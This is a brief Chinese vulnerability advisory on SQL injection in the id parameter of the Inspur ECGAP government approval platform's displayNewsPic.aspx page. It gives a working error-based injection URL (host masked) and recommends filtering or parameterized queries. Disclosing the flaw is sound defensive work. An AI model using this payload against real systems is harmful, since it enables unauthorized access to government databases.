浪潮政务审批平台ECGAP...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

###0x01漏洞简介 浪潮ECGAP政务审批系统在页面/Broadcast/displayNewsPic.aspx的参数id存在注入漏洞,远程攻击者可以利用回显报错等方式执行SQL指令。 ###0x02漏洞利用 ``` http://**.**.**.**/Broadcast/displayNewsPic.aspx?id=00187/**/and/**/1=user ``` ![](https://images.seebug.org/contribute/c883d123-6f5a-4ba2-b994-07f58b5eea86) ###0x03修复方案 过滤,或者使用参数化的SQL语句。

0%
暂无可用Exp或PoC
当前有0条受影响产品信息